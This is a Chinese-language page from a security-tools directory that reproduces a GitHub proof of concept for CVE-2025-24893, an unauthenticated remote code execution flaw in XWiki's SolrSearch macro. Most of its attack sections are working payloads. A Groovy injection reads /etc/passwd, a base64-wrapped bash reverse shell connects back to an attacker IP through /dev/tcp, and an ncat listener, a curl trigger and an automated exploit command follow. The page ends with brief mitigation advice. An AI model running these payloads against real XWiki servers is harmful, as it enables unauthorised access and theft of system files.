Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-24893-XWiki-unauthenticated-RCE-via-SolrSearch — CVE-2025-24893 是 XWiki 中的一个严重未认证远程代码执行(RCE)漏洞,XWiki 是一个流行的开源企业 wiki 平台。 | Kitploit
工具/GitHubGitHub/iiiejlyxakaptoiiiku/cve-2025-24893-xwiki-unauthenticated-rce-via-solrsearch
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育Payload 开发
GitHubiiiejlyxakaptoiiiku/cve-2025-24893-xwiki-unauthenticated-rce-via-solrsearch

CVE-2025-24893-XWiki-unauthenticated-RCE-via-SolrSearch

CVE-2025-24893 是 XWiki 中的一个严重未认证远程代码执行(RCE)漏洞,XWiki 是一个流行的开源企业 wiki 平台。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
11年前尚未审核

CVE-2025-24893 – XWiki 中未经认证的远程代码执行

0 目录

  1. 摘要
  2. 漏洞详情
  3. 受影响版本
  4. 概念验证
    • 4.1 构建载荷
    • 4.2 手动利用
    • 4.3 自动化 Python 利用
  5. 缓解措施
  6. 致谢与参考

1 摘要

  • CVE: 2025-24893
  • 组件: SolrSearch 宏(XWiki UI)
  • 严重性: 9.8 / 严重(CVSS 3.1)
  • 攻击向量: 未认证 HTTP GET
  • 影响: 任意 Groovy 执行 → 系统级 RCE(Jetty/Tomcat 用户权限)

/xwiki/bin/get/Main/SolrSearch 端点将不可信的 text= 输入直接拼接到 Freemarker 模板中。 通过提前关闭模板并打开新的 {{groovy}} … {{/groovy}} 代码块,攻击者可在无需认证的情况下执行任意 Groovy 代码。


2 漏洞详情

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss\&text=<<<USER-DATA>>>  HTTP/1.1

SolrSearch 本应将提供的文本作为纯文本内容嵌入,但宏处理器未能转义 }}},因此会发生以下情况:

  1. }}} 关闭当前 Freemarker 代码块。
  2. 攻击者打开一个新的宏:
root@kitploit:~
   {{async async=false}}{{groovy}} … {{/groovy}}{{/async}}
  • async=false 强制同步执行(即使对访客也有效)。
  1. Groovy 以 XWiki JVM 进程的权限运行。

一个打印 /etc/passwd 的最小 PoC:

root@kitploit:~
}}}{{async async=false}}{{groovy}}println("cat /etc/passwd".execute().text){{/groovy}}{{/async}}

URL 编码变体(空格 → %20,花括号 → %7B/%7D 等):

root@kitploit:~
%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d

3 受影响版本

分支修复于漏洞版本 ≤
15.x15.10.1115.10.10(以及所有 15.9 / 15.8 …)
14.x LTS

(来源:OffSec 公告 与 XWiki SEC-S 2025-02)

端点


5 概念验证

5.1 构建载荷

root@kitploit:~
RHOST="editor.htb:8080"
LHOST="10.10.14.8"
LPORT=4444

# 1.   one-liner reverse shell
SHELL="bash -c 'bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1'"

# 2.   Base64 (single line)
B64=$(echo -n "$SHELL" | base64 -w0)

# 3.   wrap in Groovy macro
RAW='}}}{{async async=false}}{{groovy}}"bash -c {echo,'$B64'}|{base64,-d}|{bash,-i}".execute(){{/groovy}}{{/async}}'

# 4.   URL-encode
PAYLOAD=$(python3 -c "import urllib.parse,sys;print(urllib.parse.quote(sys.argv[1],safe=''))" "$RAW")

5.2 手动利用

root@kitploit:~
# start listener
sudo ncat -lvnp 4444

# trigger exploit
curl "http://$RHOST/xwiki/bin/get/Main/SolrSearch?media=rss&text=${PAYLOAD}"

5.3 自动化利用

xwiki_solr_rce.py 随 exploit/ 提供(见下方代码块)。

root@kitploit:~
python CVE-2025-24893.py -u <TARGET URL> -l <IP> -p <PORT>

其中

root@kitploit:~
<TARGET URL> - URL including http:// or https://

(传入 -c "id" 可执行任意命令,而不仅仅是获得 shell) 利用 反弹 Shell


6 缓解措施

  • 升级到 15.10.11 / 14.10.17 或更高版本
  • 临时解决方案:禁用该宏
root@kitploit:~
# /etc/xwiki/xwiki.properties
solr.search.enabled = false

7 致谢与参考

  • OffSec Research:“XWiki 中的未认证 RCE” – 2025年2月20日
  • NVD 条目:https://nvd.nist.gov/vuln/detail/CVE-2025-24893
  • Exploit-DB #52136

研究与 PoC:DeX1d


免责声明:仅限教育用途。对非您拥有的系统运行此操作属于违法行为。

下载工具
14.10.17
14.10.16
13 / 12不再维护 – 所有版本仍受影响